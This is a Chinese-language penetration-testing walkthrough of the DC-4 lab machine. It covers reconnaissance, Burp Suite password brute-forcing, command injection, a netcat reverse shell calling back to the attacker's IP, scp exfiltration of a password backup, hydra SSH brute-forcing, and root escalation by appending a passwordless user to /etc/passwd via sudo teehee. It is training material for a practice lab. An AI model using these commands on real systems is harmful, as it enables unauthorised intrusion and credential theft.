DC系列靶场---DC 4靶场的渗透测试

DC-4靶场渗透测试

信息收集

地址探测

使用arp-scan进行地址探测

arp-scan -l -I eth0

Nmap扫描

nmap -sS -sV -T4 -p- -o 172.30.1.131

目标主机开启了80端口、22端口。我们可以访问一下

http探测

暴力破解

使用Burp suite

猜解用户名为admin，密码随便写。

通过Burp suite抓包看到我们输入的参数，下面使用重放模块进行爆破。

把数据包发送到intruder模块中，快捷键ctrl+l。

选择攻击类型，这里有四种攻击类型

【sinper】狙击手：对单一参数进行密码爆破

【battering ram】撞锤：对所有参数进行同一个变量爆破（如用户名和密码一样）

【pitchfork】鱼叉：对所有参数进行一一对应爆破，传递两个参数两个字典，一一对应。

【cluster bomb】集束炸弹：对参数进行交叉爆破，常用用于不知道账号密码的情况

这里使用第一种攻击狙击手，对单一参数进行爆破

选中密码，点击add添加变量。

设置payloads

Payload set我们只对密码进行爆破所以这选择1

Payload type这里我们使用字典文件所以选择Payload type

如果是社区版的Burp suite现在就可以进行攻击

专业版是可以指定攻击的线程的，我这里指定的100，好像社区版线程是10吧。

点击Start attack开始攻击。

因为我使用的字典文件很大，我们这时候可以根据长度来分辨哪个是密码，因为正确密码只有一个，我们可以点length来区分真密码，我们看到密码是happy

用户名：admin

密码：happy

输入账号密码我们就登进了（可能因为靶机原因，如果等不进去，再输入一次就可以）

这里我们看到一个command，这个不就是命令的意思嘛。初步确定存在命令注入漏洞

username:admin
password:happy

漏洞探测及利用

命令注入

这里给我们提供了三个命令，都是可以执行的。

那我们是不是就可以使用Burp suite 进行拦截修改命令。

打开Burp suite的拦截功能，去网站执行三个命令哪个都可以。

这里看到最后一行ls -l 那我们修改看看账户文件。

输入查看账户文件的命令，发送到Repeater模块，点击send发送

cat /etc/passwd

拦截修改后是可以执行的，既然这样我们就直接去获取shell

利用nc获取shell

攻击端做监听，监听4444端口等待连接

nc -lnvp 4444

被攻击端主动连接我们的攻击端

nc -nv 172.30.1.20 4444 -c /bin/bash

这时候已经拿到目标主机的shell了

利用python获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

拿到shell之后我们要做信息收集

信息收集

先看一下账户文件

 cat /etc/passwd

看到这里有三个用户jim、sam、charles。

可以去看一下这三个用户下有什么文件

ls -l /home/jim

Charles、sam用户下面并没有什么东西，但是jim用户下面有个密码备份文件，那我们就可以使用这个密码备份文件进行爆破。

使用scp把这个文件传输到我们的kali上，因为这是通过ssh传输的，所以要确定kali开启了ssh服务。

scp /home/jim/backups/old-passwords.bak [email protected]:~

使用hydra进行爆破

hydra -L dc-4-user.txt -P dc-4-pass2.txt 192.168.195.142 ssh

用户名：jim

密码：jibril04

su - jim

看看邮箱有没有东西

用户邮箱的位置：/var/mail/用户名 或/var/spool/mail/用户名

cat /var/mail/jim

来自charles发来的一封邮件，我们看到这封邮件中有个密码。

那我们就登录一下吧

su - charles

已经登陆成功了。

提权

信息收集

列出所有可以以root执行的命令

sudo -l

可以看到使用teehee提权,teehee就是tee的变体从标准输入读取并写入标准输出和文件我们可以借助teehee往passwd写入一个root账号即可得到root权限查看一下这个命令的帮助手册，使用-a参数在/etc/passwd文件里面新建一个有管理员权限的用户

teehee提权

我们要先了解账户文件的格式

echo 'xiaofeixia::0:0::/root:/bin/bash' | sudo teehee -a /etc/passwd

写入之后我们直接登录,因为我们没有设置密码，登录的时候不用输入密码。

su - xiaofeixia

cat flag.txt

总结

1、在使用Burp suite进行暴力破解时，要熟悉工具中的模块，及攻击的四种类型，这样可以大大提高效率

2、Burp suite进行攻击时可以根据长度来快速找到密码，因为正确的密码只有一个。

3、无论是拿到shell之前还是拿到shell之后都要先进行信息收集，收集到的信息越多，我们的攻击面就更多

4、在做提权没有思路的时候，我们还是要进行信息收集，通过信息收集获得更多提权的方式。